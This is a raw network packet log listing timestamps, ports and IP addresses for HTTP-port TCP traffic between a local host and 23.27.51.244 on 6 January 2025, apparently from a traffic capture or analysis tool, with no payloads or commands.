Jan 6, 2025 06:03:58.815444946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815458059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815459967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815470934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815476894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815481901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815493107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815501928 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815502882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815514088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815521002 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815525055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815536022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815541029 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815546036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815561056 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815562010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815572977 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815579891 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815582991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815603971 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815620899 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815953016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815968990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815989017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816019058 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816096067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816107035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816117048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816128016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816131115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816138029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816149950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816157103 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816159010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816169024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816180944 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816183090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816191912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816198111 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816210032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816221952 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816221952 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816232920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816241026 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816263914 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816303968 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816483021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816494942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816504955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816514015 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816515923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816534042 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816561937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816603899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816616058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816625118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816637039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816643000 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816646099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816656113 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816664934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816665888 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816668034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816679001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816689968 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816696882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816700935 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816715956 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816725016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.816730022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.816752911 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.817058086 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817070007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817080975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817091942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817099094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.817102909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817115068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817125082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.817141056 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.817173004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904047012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904170036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904196978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904207945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904227972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904239893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904243946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904247046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904257059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904270887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904279947 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904287100 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904298067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904306889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904308081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904319048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904325962 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904347897 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904371977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904371977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904392004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904491901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904503107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904512882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904524088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904534101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904541016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904545069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904555082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904562950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904566050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904576063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904583931 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904597998 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904618979 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904870033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904880047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904890060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904901981 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.904917002 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904942036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.904970884 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905026913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905038118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905047894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905059099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905069113 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905071974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905097961 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905116081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905169964 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905180931 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905189991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905201912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905213118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905220032 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905224085 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905237913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905241013 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905250072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905255079 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905261040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905271053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905280113 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905291080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905301094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905301094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905323982 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905570984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905580044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905627012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905745029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905755997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905765057 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905774117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905783892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905787945 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905806065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905807972 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905817986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905829906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905829906 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905841112 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905849934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905855894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905867100 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905868053 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905878067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905883074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905888081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905899048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905908108 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905909061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905920029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905930996 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905941010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905946016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905946016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905951977 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905968904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905977011 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.905981064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.905993938 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906002045 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906004906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906016111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906021118 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906039000 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906065941 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906697035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906714916 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906724930 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906740904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906744003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906752110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906761885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906769991 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906773090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906783104 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906790018 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906794071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906804085 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906809092 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906815052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906825066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906829119 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906836033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906846046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906848907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906857014 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906866074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906867981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906877041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906887054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906888008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906898975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906909943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906912088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906919956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906935930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906943083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.906951904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.906982899 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907450914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907461882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907471895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907481909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907493114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907502890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907511950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907512903 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907511950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907522917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907536030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907541037 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907543898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907555103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907560110 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907565117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907574892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907578945 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907598019 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907612085 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907778025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907788992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907799006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907809019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907819986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907821894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907835960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907849073 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907851934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907866001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907872915 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907876015 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907886982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907891989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907897949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907907963 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.907912016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.907939911 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994699955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994712114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994724035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994793892 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994834900 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994844913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994857073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994865894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994878054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994882107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994894028 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994898081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994904041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994915009 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994925022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994930029 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994935989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994949102 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994951963 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.994968891 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.994993925 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995028973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995038986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995048046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995073080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995096922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995136023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995146990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995157003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995167017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995182991 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995213032 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995290041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995301008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995310068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995323896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995335102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995337963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995347023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995357990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995363951 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995363951 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995369911 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995388985 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995412111 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995538950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995549917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995562077 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995569944 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995588064 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995608091 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995678902 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995688915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995698929 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995708942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995719910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995722055 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995729923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995740891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.995748043 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995795012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.995795012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996001005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996011019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996021032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996032000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996042967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996052980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996053934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996064901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996073961 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996074915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996085882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996093988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996095896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996107101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996113062 CET	49709	80	192.168.2.6	23.27.51.244
